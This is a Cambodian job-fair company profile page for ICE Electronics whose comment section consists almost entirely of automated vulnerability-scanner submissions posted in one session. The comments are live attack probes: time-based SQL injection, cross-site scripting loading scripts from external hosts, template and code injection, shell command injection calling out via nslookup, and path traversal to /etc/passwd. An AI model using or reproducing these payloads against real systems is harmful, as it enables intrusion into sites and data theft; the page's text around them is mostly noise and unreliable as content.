ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

អាយ អេឡិកត្រូនិក


ICE Electronics Co., Ltd is a technology-focused solution based company providing the necessary component for the success of the business. The company provides a broad range of services including computer hardware, laptops, Studio PC, CCTV systems, websites, database programming, and many more. We pride ourselves in carrying the best of what technology has to offer as well as mainstreaming and educating the client on how to capitalize on what technology can do for them.


ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 38

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 51 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 10:12:05


  @@vwOg4


 • pHqghUme

  2021-05-06 10:12:02


  1'"


 • pHqghUme

  2021-05-06 10:12:01


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 10:11:50


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 10:11:35


  DDykNMhn')) OR 939=(SELECT 939 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:11:15


  iBBWB7RM') OR 991=(SELECT 991 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:11:00


  KyaNhLrH' OR 134=(SELECT 134 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:10:45


  -1)) OR 541=(SELECT 541 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:10:32


  -5) OR 762=(SELECT 762 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:10:15


  -5 OR 844=(SELECT 844 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 10:09:52


  vxIo4mhK'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 10:09:29


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 10:09:08


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 10:08:44


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 10:08:23


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 10:07:56


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 10:07:39


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 10:07:21


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 10:06:58


  -1" OR 2+627-627-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 10:06:57


  -1' OR 2+980-980-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 10:06:57


  -1' OR 2+505-505-1=0+0+0+1 or 'gDPsNsio'='


 • pHqghUme

  2021-05-06 10:06:56


  -1 OR 2+810-810-1=0+0+0+1


 • pHqghUme

  2021-05-06 10:06:55


  -1 OR 2+265-265-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 10:06:54


  NNpUGsiI


 • pHqghUme

  2021-05-06 10:06:32


  1


 • pHqghUme

  2021-05-06 10:06:12


  1


 • @@S6sfs

  2021-05-06 10:05:50


  1


 • 1'"

  2021-05-06 10:05:41


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 10:05:40


  1


 • DneR8B8p')) OR 595=(SELECT 595 FROM PG_SLEEP(15))--

  2021-05-06 10:05:20


  1


 • RR92gQmw') OR 651=(SELECT 651 FROM PG_SLEEP(15))--

  2021-05-06 10:04:56


  1


 • Iufo2UHI' OR 46=(SELECT 46 FROM PG_SLEEP(15))--

  2021-05-06 10:04:18


  1


 • p5KBcNhf'; waitfor delay '0:0:15' --

  2021-05-06 10:03:48


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 10:03:25


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 10:03:02


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 10:02:31


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 10:02:05


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 10:01:44


  1


 • -1" OR 2+712-712-1=0+0+0+1 --

  2021-05-06 10:01:18


  1


 • -1' OR 2+540-540-1=0+0+0+1 or 'SjbyCjmO'='

  2021-05-06 10:01:17


  1


 • -1' OR 2+631-631-1=0+0+0+1 --

  2021-05-06 10:01:16


  1


 • -1 OR 2+406-406-1=0+0+0+1

  2021-05-06 10:01:15


  1


 • -1 OR 2+664-664-1=0+0+0+1 --

  2021-05-06 10:01:14


  1


 • k3kjDyJa

  2021-05-06 10:01:11


  1


 • pHqghUme

  2021-05-06 10:00:41


  1


 • pHqghUme

  2021-05-06 10:00:19


  1


 • pHqghUme

  2021-05-06 09:59:50


  1


 • pHqghUme

  2021-05-06 09:59:46


  1


 • pHqghUme

  2021-05-06 09:59:46


  1


 • pHqghUme

  2021-05-06 09:59:34


  1<k1asO4<


 • pHqghUme

  2021-05-06 09:59:22


  1


 • pHqghUme

  2021-05-06 09:59:21


  1<img sRc='http://attacker-9551/log.php?


 • pHqghUme

  2021-05-06 09:59:08


  1<wjusjd x=9382>


 • pHqghUme

  2021-05-06 09:59:00


  1<ifRAme sRc=9353.com></IfRamE>


 • pHqghUme

  2021-05-06 09:58:58


  1


 • pHqghUme

  2021-05-06 09:58:54


  1<WLBVBB>FRCUA[!+!]</WLBVBB>


 • pHqghUme

  2021-05-06 09:58:46


  1OxLYX <ScRiPt >SVtR(9144)</ScRiPt>


 • pHqghUme

  2021-05-06 09:58:36


  1<% contenteditable onresize=SVtR(9222)>


 • pHqghUme

  2021-05-06 09:58:29


  1


 • pHqghUme

  2021-05-06 09:58:23


  1}body{acu:Expre/**/SSion(SVtR(9515))}


 • pHqghUme

  2021-05-06 09:58:10


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 09:57:59


  1


 • pHqghUme

  2021-05-06 09:57:56


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 09:57:42


  1<input autofocus onfocus=SVtR(9747)>


 • pHqghUme

  2021-05-06 09:57:35


  1


 • pHqghUme

  2021-05-06 09:57:20


  1&lt;ScRiPt&gt;SVtR(9267)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 09:57:10


  1\u003CScRiPt\SVtR(9309)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 09:57:05


  1


 • pHqghUme

  2021-05-06 09:57:02


  %31%3C%53%63%52%69%50%74%20%3E%53%56%74%52%289928%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 09:56:54


  1<img/src=">" onerror=alert(9494)>


 • pHqghUme

  2021-05-06 09:56:45


  1


 • pHqghUme

  2021-05-06 09:56:43


  1<img src=xyz OnErRor=SVtR(9014)>


 • pHqghUme

  2021-05-06 09:56:32


  1<img src=//xss.bxss.me/t/dot.gif onload=SVtR(9723)>


 • pHqghUme

  2021-05-06 09:56:24


  1<body onload=SVtR(9542)>


 • pHqghUme

  2021-05-06 09:56:22


  1


 • pHqghUme

  2021-05-06 09:56:14


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9067'>


 • pHqghUme

  2021-05-06 09:56:05


  1<isindex type=image src=1 onerror=SVtR(9793)>


 • pHqghUme

  2021-05-06 09:55:58


  1


 • pHqghUme

  2021-05-06 09:55:48


  1<ScRiPt >SVtR(9724)</ScRiPt>


 • pHqghUme

  2021-05-06 09:55:39


  1


 • pHqghUme

  2021-05-06 09:55:39


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9480></ScRiPt>


 • pHqghUme

  2021-05-06 09:55:38


  1


 • pHqghUme

  2021-05-06 09:55:37


  1


 • pHqghUme

  2021-05-06 09:55:36


  1


 • pHqghUme

  2021-05-06 09:55:34


  1


 • pHqghUme

  2021-05-06 09:55:33


  1


 • pHqghUme

  2021-05-06 09:55:28


  1<ScRiPt >SVtR(9789)</ScRiPt>


 • pHqghUme

  2021-05-06 09:55:18


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%56%74%52%28%39%33%34%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 09:55:16


  1


 • pHqghUme

  2021-05-06 09:55:10


  1<script>SVtR(9717)</script>


 • pHqghUme

  2021-05-06 09:55:02


  1<WLJVV7>KJPVJ[!+!]</WLJVV7>


 • pHqghUme

  2021-05-06 09:54:56


  1


 • pHqghUme

  2021-05-06 09:54:48


  1<ScRiPt >SVtR(9144)</ScRiPt>


 • pHqghUme

  2021-05-06 09:54:34


  1


 • pHqghUme

  2021-05-06 09:54:30


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 09:54:28


  1


 • pHqghUme

  2021-05-06 09:54:24


  1


 • pHqghUme

  2021-05-06 09:54:15


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 09:54:03


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 09:53:56


  1


 • pHqghUme

  2021-05-06 09:53:53


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 09:53:47


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:53:41


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 09:53:35


  1


 • pHqghUme

  2021-05-06 09:53:33


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 09:53:18


  1


 • pHqghUme

  2021-05-06 09:53:15


  acux10696%C0%BEz1%C0%BCz2a%90bcxuca10696


 • pHqghUme

  2021-05-06 09:53:07


  acu6978%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6978


 • pHqghUme

  2021-05-06 09:53:02


  1


 • pHqghUme

  2021-05-06 09:52:56


  19443360


 • pHqghUme

  2021-05-06 09:52:44


  1


 • pHqghUme

  2021-05-06 09:52:44


  '"()&%<acx><ScRiPt >SVtR(9336)</ScRiPt>


 • pHqghUme

  2021-05-06 09:52:31


  1'"()&%<acx><ScRiPt >SVtR(9182)</ScRiPt>


 • pHqghUme

  2021-05-06 09:52:27


  1


 • pHqghUme<KU465u<

  2021-05-06 09:52:19


  1


 • pHqghUme

  2021-05-06 09:52:08


  1


 • pHqghUme<img sRc='http://attacker-9140/log.php?

  2021-05-06 09:52:07


  1


 • pHqghUme<iRf2oL x=9064>

  2021-05-06 09:51:59


  1


 • pHqghUme<ifRAme sRc=9674.com></IfRamE>

  2021-05-06 09:51:49


  1


 • pHqghUme<WMY72J>1U95G[!+!]</WMY72J>

  2021-05-06 09:51:41


  1


 • pHqghUme

  2021-05-06 09:51:40


  1


 • pHqghUme5v4xU <ScRiPt >SVtR(9415)</ScRiPt>

  2021-05-06 09:51:29


  1


 • pHqghUme<% contenteditable onresize=SVtR(9878)>

  2021-05-06 09:51:20


  1


 • pHqghUme

  2021-05-06 09:51:19


  1


 • pHqghUme}body{acu:Expre/**/SSion(SVtR(9904))}

  2021-05-06 09:51:10


  1


 • pHqghUme

  2021-05-06 09:51:01


  1


 • pHqghUme

  2021-05-06 09:51:00


  1


 • pHqghUme

  2021-05-06 09:50:59


  1


 • pHqghUme

  2021-05-06 09:50:58


  1


 • pHqghUme

  2021-05-06 09:50:57


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 09:50:57


  1


 • pHqghUme

  2021-05-06 09:50:56


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 09:50:49


  1


 • pHqghUme<input autofocus onfocus=SVtR(9316)>

  2021-05-06 09:50:38


  1


 • pHqghUme

  2021-05-06 09:50:35


  1


 • pHqghUme&lt;ScRiPt&gt;SVtR(9403)&lt;/sCripT&gt;

  2021-05-06 09:50:28


  1


 • pHqghUme\u003CScRiPt\SVtR(9058)\u003C/sCripT\u003E

  2021-05-06 09:50:20


  1


 • pHqghUme

  2021-05-06 09:50:15


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%53%56%74%52%289702%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 09:50:14


  1


 • pHqghUme<img/src=">" onerror=alert(9178)>

  2021-05-06 09:50:06


  1


 • pHqghUme<img src=xyz OnErRor=SVtR(9861)>

  2021-05-06 09:49:59


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=SVtR(9711)>

  2021-05-06 09:49:53


  1


 • pHqghUme<body onload=SVtR(9711)>

  2021-05-06 09:49:44


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9600'>

  2021-05-06 09:49:38


  1


 • pHqghUme<isindex type=image src=1 onerror=SVtR(9743)>

  2021-05-06 09:49:32


  1


 • pHqghUme<ScRiPt >SVtR(9901)</ScRiPt>

  2021-05-06 09:49:19


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9896></ScRiPt>

  2021-05-06 09:49:07


  1


 • pHqghUme<ScRiPt >SVtR(9995)</ScRiPt>

  2021-05-06 09:48:53


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%56%74%52%28%39%38%34%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 09:48:39


  1


 • pHqghUme<script>SVtR(9577)</script>

  2021-05-06 09:48:29


  1


 • pHqghUme<W6TARN>UWCUE[!+!]</W6TARN>

  2021-05-06 09:48:23


  1


 • pHqghUme<ScRiPt >SVtR(9667)</ScRiPt>

  2021-05-06 09:48:16


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 09:48:09


  1


 • acx__${98991*97996}__::.x

  2021-05-06 09:48:00


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 09:47:52


  1


 • acx{{98991*97996}}xca

  2021-05-06 09:47:45


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 09:47:35


  1


 • <th:t="${acx}#foreach

  2021-05-06 09:47:25


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 09:47:17


  1


 • acux9050%C0%BEz1%C0%BCz2a%90bcxuca9050

  2021-05-06 09:47:07


  1


 • acu6155%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6155

  2021-05-06 09:46:57


  1


 • pHqghUme9452587

  2021-05-06 09:46:47


  1


 • '"()&%<acx><ScRiPt >SVtR(9062)</ScRiPt>

  2021-05-06 09:46:36


  1


 • pHqghUme

  2021-05-06 09:46:34


  1


 • pHqghUme'"()&%<acx><ScRiPt >SVtR(9749)</ScRiPt>

  2021-05-06 09:46:27


  1


 • pHqghUme

  2021-05-06 09:46:21


  1


 • pHqghUme

  2021-05-06 09:46:16


  1


 • pHqghUme

  2021-05-06 09:46:07


  1


 • pHqghUme

  2021-05-06 09:45:54


  1


 • pHqghUme

  2021-05-06 09:45:42


  1


 • pHqghUme

  2021-05-06 09:45:28


  1


 • pHqghUme

  2021-05-06 09:45:22


  1


 • pHqghUme

  2021-05-06 09:45:19


  <!--


 • <!--

  2021-05-06 09:45:18


  1


 • pHqghUme

  2021-05-06 09:45:18


  '"


 • pHqghUme

  2021-05-06 09:45:17


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 09:45:17


  1


 • pHqghUme

  2021-05-06 09:45:17


  bxss.me/t/xss.html?%00


 • '"

  2021-05-06 09:45:17


  1


 • pHqghUme

  2021-05-06 09:45:16


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 09:45:16


  1


 • pHqghUme

  2021-05-06 09:45:15


  1


 • pHqghUme

  2021-05-06 09:45:15


  1


 • pHqghUme

  2021-05-06 09:45:15


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 09:45:15


  1


 • pHqghUme

  2021-05-06 09:45:14


  1


 • pHqghUme

  2021-05-06 09:45:14


  1


 • pHqghUme

  2021-05-06 09:45:13


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 09:45:13


  1


 • /xfs.bxss.me

  2021-05-06 09:45:12


  1


 • pHqghUme

  2021-05-06 09:45:12


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 09:45:11


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 09:45:11


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 09:45:11


  1


 • pHqghUme

  2021-05-06 09:45:10


  1


 • pHqghUme

  2021-05-06 09:45:10


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 09:45:10


  1


 • pHqghUme

  2021-05-06 09:45:09


  ${@print(md5(31337))}


 • pHqghUme

  2021-05-06 09:45:09


  1


 • pHqghUme

  2021-05-06 09:45:08


  '+'A'.concat(70-3).concat(22*4).concat(101).concat(82).concat(104).concat(70)+(require'socket' Socket.gethostbyname('hitte'+'flhymeehe6d78.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 09:45:08


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 09:45:07


  "+"A".concat(70-3).concat(22*4).concat(105).concat(67).concat(120).concat(72)+(require"socket" Socket.gethostbyname("hitvi"+"ebsrbyzj20a13.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 09:45:07


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 09:45:06


  '"()


 • '+'A'.concat(70-3).concat(22*4).concat(118).concat(78).concat(110).concat(76)+(require'socket' Socket.gethostbyname('hitjq'+'dwpsbxua0cc36.bxss.me.')[3].to_s)+'

  2021-05-06 09:45:06


  1


 • pHqghUme

  2021-05-06 09:45:06


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • ${@print(md5(31337))}\

  2021-05-06 09:45:04


  1


 • pHqghUme

  2021-05-06 09:45:04


  1


 • "+"A".concat(70-3).concat(22*4).concat(97).concat(67).concat(101).concat(77)+(require"socket" Socket.gethostbyname("hitsx"+"tabfvqsr46d57.bxss.me.")[3].to_s)+"

  2021-05-06 09:45:04


  1


 • '.print(md5(31337)).'

  2021-05-06 09:45:04


  1


 • ${@print(md5(31337))}

  2021-05-06 09:45:03


  1


 • ";print(md5(31337));$a="

  2021-05-06 09:45:02


  1


 • pHqghUme

  2021-05-06 09:45:02


  1


 • pHqghUme

  2021-05-06 09:45:01


  1


 • '"()

  2021-05-06 09:45:01


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 09:45:00


  1


 • pHqghUme

  2021-05-06 09:45:00


  1


 • ';print(md5(31337));$a='

  2021-05-06 09:45:00


  1


 • pHqghUme

  2021-05-06 09:44:59


  1


 • pHqghUme

  2021-05-06 09:44:58


  1


 • pHqghUme

  2021-05-06 09:44:57


  1


 • pHqghUme

  2021-05-06 09:44:57


  1


 • pHqghUme

  2021-05-06 09:44:56


  1


 • pHqghUme

  2021-05-06 09:44:56


  1


 • pHqghUme

  2021-05-06 09:44:55


  1


 • pHqghUme

  2021-05-06 09:44:55


  1


 • pHqghUme

  2021-05-06 09:44:55


  1


 • pHqghUme

  2021-05-06 09:44:54


  1


 • pHqghUme

  2021-05-06 09:44:53


  1


 • pHqghUme

  2021-05-06 09:44:53


  1


 • pHqghUme

  2021-05-06 09:44:52


  1


 • pHqghUme

  2021-05-06 09:44:49


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 09:44:48


  1


 • pHqghUme

  2021-05-06 09:44:48


  ".gethostbyname(lc("hitwl"."frxnhkccb0189.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(83).chr(107).chr(85)."


 • pHqghUme

  2021-05-06 09:44:47


  '.gethostbyname(lc('hitep'.'vwgcwngef850e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(69).chr(117).chr(86).'


 • pHqghUme

  2021-05-06 09:44:46


  1


 • '.gethostbyname(lc('hitiv'.'rhugdxvx042c5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(71).chr(106).chr(68).'

  2021-05-06 09:44:46


  1


 • ".gethostbyname(lc("hitzi"."xynjkmnm195f5.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(85).chr(117).chr(73)."

  2021-05-06 09:44:46


  1


 • pHqghUme

  2021-05-06 09:44:45


  1


 • pHqghUme

  2021-05-06 09:44:45


  1


 • pHqghUme

  2021-05-06 09:44:44


  1


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 09:44:42


  1


 • pHqghUme

  2021-05-06 09:44:41


  !(()&&!|*|*|


 • pHqghUme

  2021-05-06 09:44:41


  ^(#$!@#$)(()))******


 • ^(#$!@#$)(()))******

  2021-05-06 09:44:40


  1


 • pHqghUme

  2021-05-06 09:44:40


  1&n955146=v932322


 • pHqghUme

  2021-05-06 09:44:40


  )


 • !(()&&!|*|*|

  2021-05-06 09:44:39


  1


 • pHqghUme

  2021-05-06 09:44:38


  |(nslookup hitlpudjzwbmd4952b.bxss.me||perl -e "gethostbyname('hitlpudjzwbmd4952b.bxss.me')")


 • )

  2021-05-06 09:44:38


  1


 • pHqghUme

  2021-05-06 09:44:38


  `(nslookup hitbwqlamuroae27d0.bxss.me||perl -e "gethostbyname('hitbwqlamuroae27d0.bxss.me')")`


 • pHqghUme

  2021-05-06 09:44:37


  1


 • pHqghUme

  2021-05-06 09:44:37


  1


 • pHqghUme

  2021-05-06 09:44:36


  1


 • pHqghUme

  2021-05-06 09:44:36


  1


 • pHqghUme

  2021-05-06 09:44:36


  1


 • pHqghUme&n921950=v997662

  2021-05-06 09:44:35


  1


 • pHqghUme

  2021-05-06 09:44:35


  1


 • pHqghUme

  2021-05-06 09:44:32


  (nslookup hitvvygfciooad6d36.bxss.me||perl -e "gethostbyname('hitvvygfciooad6d36.bxss.me')")


 • pHqghUme

  2021-05-06 09:44:32


  $(nslookup hitpznajvamtd7b6c8.bxss.me||perl -e "gethostbyname('hitpznajvamtd7b6c8.bxss.me')")


 • pHqghUme

  2021-05-06 09:44:31


  bxss.me


 • pHqghUme

  2021-05-06 09:44:30


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 09:44:30


  |echo npoubc$()\ vyqrza\nz^xyu||a #' |echo npoubc$()\ vyqrza\nz^xyu||a #|" |echo npoubc$()\ vyqrza\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:44:28


  echo vesixt$()\ vqdnql\nz^xyu||a #' &echo vesixt$()\ vqdnql\nz^xyu||a #|" &echo vesixt$()\ vqdnql\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:44:28


  1some_inexistent_file_with_long_name%00.jpg


 • pHqghUme

  2021-05-06 09:44:28


  &echo mphebl$()\ hwsves\nz^xyu||a #' &echo mphebl$()\ hwsves\nz^xyu||a #|" &echo mphebl$()\ hwsves\nz^xyu||a #


 • pHqghUme

  2021-05-06 09:44:28


  Http://bxss.me/t/fit.txt


 • bxss.me

  2021-05-06 09:44:27


  1


 • pHqghUme

  2021-05-06 09:44:27


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 09:44:26


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 09:44:25


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 09:44:24


  1


 • `(nslookup hitmuugkmhezfcdf00.bxss.me||perl -e "gethostbyname('hitmuugkmhezfcdf00.bxss.me')")`

  2021-05-06 09:44:24


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 09:44:23


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 09:44:22


  1


 • |(nslookup hityjeziplyzs6cc84.bxss.me||perl -e "gethostbyname('hityjeziplyzs6cc84.bxss.me')")

  2021-05-06 09:44:22


  1


 • pHqghUme

  2021-05-06 09:44:21


  1


 • pHqghUme

  2021-05-06 09:44:20


  1


 • pHqghUme

  2021-05-06 09:44:19


  1


 • pHqghUme

  2021-05-06 09:44:19


  1


 • pHqghUme

  2021-05-06 09:44:19


  1


 • pHqghUme

  2021-05-06 09:44:18


  1


 • (nslookup hitxspbnepjri92e1e.bxss.me||perl -e "gethostbyname('hitxspbnepjri92e1e.bxss.me')")

  2021-05-06 09:44:18


  1


 • $(nslookup hitfczbeglhogf243c.bxss.me||perl -e "gethostbyname('hitfczbeglhogf243c.bxss.me')")

  2021-05-06 09:44:18


  1


 • pHqghUme

  2021-05-06 09:44:17


  1


 • &echo vconyf$()\ vdlqyh\nz^xyu||a #' &echo vconyf$()\ vdlqyh\nz^xyu||a #|" &echo vconyf$()\ vdlqyh\nz^xyu||a #

  2021-05-06 09:44:17


  1


 • |echo bdzshg$()\ gqjeqy\nz^xyu||a #' |echo bdzshg$()\ gqjeqy\nz^xyu||a #|" |echo bdzshg$()\ gqjeqy\nz^xyu||a #

  2021-05-06 09:44:17


  1


 • pHqghUme

  2021-05-06 09:44:17


  1


 • pHqghUme

  2021-05-06 09:44:16


  1


 • echo uejjdb$()\ jmlhcb\nz^xyu||a #' &echo uejjdb$()\ jmlhcb\nz^xyu||a #|" &echo uejjdb$()\ jmlhcb\nz^xyu||a #

  2021-05-06 09:44:16


  1


 • pHqghUme

  2021-05-06 09:44:15


  1


 • pHqghUme

  2021-05-06 09:44:15


  1


 • NVB6TjVDem8=

  2021-05-06 09:44:15


  1


 • pHqghUme

  2021-05-06 09:44:14


  1<esi:include src="http://bxss.me/rpb.png"/>


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 09:44:13


  1


 • pHqghUme

  2021-05-06 09:44:13


  1


 • pHqghUme

  2021-05-06 09:44:12


  1


 • pHqghUme

  2021-05-06 09:44:12


  1


 • pHqghUme

  2021-05-06 09:44:09


  1


 • ${9999385+9999087}

  2021-05-06 09:44:08


  1


 • pHqghUme

  2021-05-06 09:44:08


  1


 • pHqghUme

  2021-05-06 09:44:08


  ${10000328+9999498}


 • pHqghUme

  2021-05-06 09:44:07


  1


 • pHqghUme

  2021-05-06 09:44:07


  1


 • pHqghUme

  2021-05-06 09:44:07


  1


 • pHqghUme

  2021-05-06 09:44:07


  1


 • pHqghUme

  2021-05-06 09:44:05


  1


 • pHqghUme

  2021-05-06 09:44:05


  1


 • pHqghUme

  2021-05-06 09:44:05


  ../1


 • pHqghUme

  2021-05-06 09:44:04


  1


 • pHqghUme

  2021-05-06 09:44:03


  1


 • pHqghUme

  2021-05-06 09:44:03


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 09:44:03


  1


 • pHqghUme

  2021-05-06 09:44:03


  ../../../../../../../../../../../../../../windows/win.ini


 • pHqghUme

  2021-05-06 09:44:02


  1


 • pHqghUme

  2021-05-06 09:44:02


  1


 • ../pHqghUme

  2021-05-06 09:44:02


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 09:44:01


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 09:44:01


  1


 • pHqghUme

  2021-05-06 09:44:00


  1


 • pHqghUme

  2021-05-06 09:44:00


  1


 • pHqghUme

  2021-05-06 09:43:59


  1


 • pHqghUme

  2021-05-06 09:43:58


  1


 • pHqghUme

  2021-05-06 09:43:58


  1


 • pHqghUme

  2021-05-06 09:43:57


  1


 • pHqghUme

  2021-05-06 09:43:57


  1


 • pHqghUme

  2021-05-06 09:43:56


  1


 • pHqghUme

  2021-05-06 09:43:56


  1


 • pHqghUme

  2021-05-06 09:43:55


  1


 • pHqghUme

  2021-05-06 09:43:54


  1


 • pHqghUme

  2021-05-06 09:43:52


  1


 • MPLcnHPr

  2021-05-06 09:43:50


  1


 • pHqghUme

  2021-05-06 09:43:50


  1


 • pHqghUme

  2021-05-06 09:43:50


  tg9beBj4


 • pHqghUme

  2021-05-06 09:43:49


  1


 • pHqghUme

  2021-05-06 09:43:49


  1


 • pHqghUme

  2021-05-06 09:43:49


  1


 • pHqghUme

  2021-05-06 09:43:49


  1


 • pHqghUme

  2021-05-06 09:43:48


  1


 • pHqghUme

  2021-05-06 09:43:48


  1


 • pHqghUme

  2021-05-06 09:43:47


  '+response.write(9461519*9872294)+'


 • pHqghUme

  2021-05-06 09:43:47


  "+response.write(9461519*9872294)+"


 • pHqghUme

  2021-05-06 09:43:46


  response.write(9461519*9872294)


 • "+response.write(9081658*9690297)+"

  2021-05-06 09:43:45


  1


 • response.write(9081658*9690297)

  2021-05-06 09:43:44


  1


 • '+response.write(9081658*9690297)+'

  2021-05-06 09:43:44


  1


 • pHqghUme

  2021-05-06 09:43:43


  1


 • pHqghUme

  2021-05-06 09:43:43


  1


 • pHqghUme

  2021-05-06 09:43:42


  1


 • pHqghUme

  2021-05-06 09:43:42


  1


 • pHqghUme

  2021-05-06 09:43:41


  1


 • pHqghUme

  2021-05-06 09:43:39


  1


